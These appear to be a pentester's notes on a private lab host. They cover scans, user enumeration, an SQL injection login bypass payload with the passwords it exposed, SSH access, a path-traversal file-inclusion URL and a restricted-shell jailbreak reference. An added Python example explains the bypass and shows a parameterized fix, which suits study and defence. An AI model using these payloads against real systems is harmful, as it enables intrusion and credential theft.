192.168.1.23
scan with nmap:
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
maybe Ubuntu 8.04
version check with smbclient: Samba 3.0.28a
enum4linux 192.168.1.23:
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
gobuster:
/images (Status: 301)
/index (Status: 200)
/index.php (Status: 200)
/john (Status: 301)
/logout (Status: 302)
/member (Status: 302)
/robert (Status: 301)
sql injection:
username john, password a' or 1=1 and 'a'='a
MyNameIsJohn
username robert, password a' or 1=1 and 'a'='a
ADGAdsafdfwt4gadfga==
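
Why that password input passes the login check, and the parameterized fix, as an added example (not code from the target application or from these notes). It uses Python with an in-memory SQLite database as a stand-in for the PHP login; the members table, its columns, the stored passwords and the function names are assumptions.

```python
import sqlite3

# The password field input recorded in the notes above.
PAGE_PASSWORD_INPUT = "a' or 1=1 and 'a'='a"


def make_db():
    """Build a constructed sample database (schema and values are assumptions)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO members VALUES (?, ?)",
        [("john", "constructed-pw-1"), ("robert", "constructed-pw-2")],
    )
    return db


def login_concat(db, username, password):
    """Vulnerable pattern: user input is pasted into the SQL text.

    With the input above the WHERE clause becomes
      username = 'john' AND password = 'a' or 1=1 and 'a'='a'
    AND binds tighter than OR, so the second branch is always true.
    """
    sql = (
        "SELECT username FROM members "
        "WHERE username = '%s' AND password = '%s'" % (username, password)
    )
    return db.execute(sql).fetchone() is not None


def login_bound(db, username, password):
    """Hardened pattern: values are bound as data and never parsed as SQL."""
    sql = "SELECT username FROM members WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


def demo():
    """Run both login variants against the same constructed data."""
    db = make_db()
    return {
        "concat_wrong_pw": login_concat(db, "john", "wrong"),
        "concat_page_input": login_concat(db, "john", PAGE_PASSWORD_INPUT),
        "bound_page_input": login_bound(db, "john", PAGE_PASSWORD_INPUT),
        "bound_real_pw": login_bound(db, "john", "constructed-pw-1"),
    }


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(name, accepted)
```
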
ssh john@192.168.1.23
echo $SHELL
/bin/kshell
local file inclusion with null byte:
http://192.168.1.23/member.php?username=../../../../bin/kshell
https://github.com/ghantoos/lshell
jail break:
https://github.com/ghantoos/lshell/issues/149